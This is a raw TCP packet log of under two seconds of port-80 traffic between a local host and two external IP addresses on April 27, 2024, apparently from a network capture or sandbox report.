Apr 27, 2024 02:19:11.425786018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.432542086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.432581902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.432604074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.458062887 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.458158970 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.472733021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.472975969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.472976923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.472989082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.473002911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.473016024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.473031998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.473063946 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.473074913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.473130941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.473186970 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.473248959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.518754005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.518804073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.518834114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.527920961 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.527991056 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.529687881 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.529757977 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.529830933 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.529886961 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.530462027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.530515909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.530514002 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.572150946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.572227001 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.576304913 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.576383114 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.576508999 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.576553106 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.576561928 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.576603889 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.577152967 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.577171087 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.577229977 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.577869892 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.577949047 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.577955961 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.578005075 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.627702951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.627743959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.627793074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.628870010 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.628931046 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.667924881 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.668091059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.668111086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.668180943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.668241978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.668248892 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.668359995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.668405056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.668493986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.668585062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.668632030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.699507952 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.699593067 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.701567888 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.701644897 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.714504004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.714579105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.714653969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.726099968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.726715088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.726787090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.747452974 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.747538090 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.747577906 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.747605085 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.747627974 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.747658968 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.747663975 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.747713089 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.748219013 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.748272896 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.748369932 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.748420000 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.748929024 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.748982906 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.749022961 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.749074936 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.767748117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.767864943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.767910957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.800353050 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.800430059 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.822571993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.822657108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.822721958 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.864428043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.864443064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.864454031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.864485979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.864506006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.864531994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.864531994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.864547968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.864604950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.864629984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.864630938 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.864679098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.870326042 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.870387077 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.872708082 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.872766018 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.908998966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.909013033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.909082890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.914583921 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.918354988 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.918410063 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.918422937 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.918421984 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.918469906 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.918469906 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.919315100 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.919328928 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.919379950 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.919421911 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.919858932 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.919872999 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.919912100 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.921916008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.921931028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.922039986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.962189913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.962234974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:11.962295055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:11.970531940 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.970590115 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:11.970597029 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:11.970662117 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.016805887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.016880035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.016983032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.040878057 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.040932894 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.040973902 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.041017056 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.043154955 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.043220997 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.059828043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.059883118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.059925079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.059930086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.060216904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.060264111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.060313940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.060395956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.060493946 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.060527086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.060589075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.060636044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.089284897 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.089370966 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.089464903 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.089525938 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.089529037 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.089576006 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.090373993 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.090442896 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.090450048 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.090502024 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.090528011 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.090584040 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.090598106 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.090647936 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.103746891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.103913069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.103988886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.117693901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.117779970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.117846012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.141088009 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.141191959 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.157052994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.157190084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.157263994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.211437941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.211581945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.211668015 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.211699009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.211747885 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.211766005 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.211816072 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.213418007 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.213504076 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.213505030 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.213572025 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.254446983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.254549026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.254641056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.254683018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.254843950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.254925966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.254934072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.255016088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.255105972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.255114079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.255450964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.255636930 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.260011911 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.260118008 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.260493040 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.260555029 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.260582924 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.260637999 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.261226892 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.261279106 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.261312008 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.261334896 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.261378050 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.261408091 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.299643040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.299659014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.299932957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.312316895 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.312330961 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.312438965 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.313087940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.313101053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.313189983 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.353512049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.353620052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.353705883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.353827000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.383460045 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.383529902 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.383589983 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.383634090 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.384378910 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.384421110 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.384434938 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.384471893 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.407102108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.407166958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.407186031 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.432347059 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.432436943 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.432491064 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.432987928 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.433027983 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.433059931 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.433062077 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.433113098 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.433502913 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.433561087 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.433589935 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.433633089 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.450678110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.450752020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.450773001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.450875044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.450918913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.450920105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.451011896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.451098919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.451122046 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.451524019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.451584101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.451592922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.484379053 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.484416008 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.484467983 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.484499931 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.495467901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.495501041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.495527029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.508167982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.508229017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.508238077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.554930925 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.554995060 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.555015087 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.555057049 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.555576086 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.555633068 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.555808067 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.555859089 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.590171099 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.602375031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.602636099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.602649927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.602684975 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.602770090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.602813959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.603754044 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.603812933 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.603934050 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.603991032 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.604000092 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.604047060 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.604065895 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.604130983 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.604476929 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.604521990 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.604547024 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.604583025 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.646404028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.646471977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.646533966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.646557093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.646646023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.646699905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.646712065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.646724939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.646792889 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.647126913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.647171021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.647219896 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.655675888 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.655733109 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.655756950 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.655782938 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.655786991 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.655833006 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.690484047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.690499067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.690541983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.690655947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.702744961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.702759981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 02:19:12.702831984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 02:19:12.726605892 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.726686001 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 02:19:12.726984978 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 02:19:12.727042913 CEST	49733	80	192.168.2.4	185.172.128.76
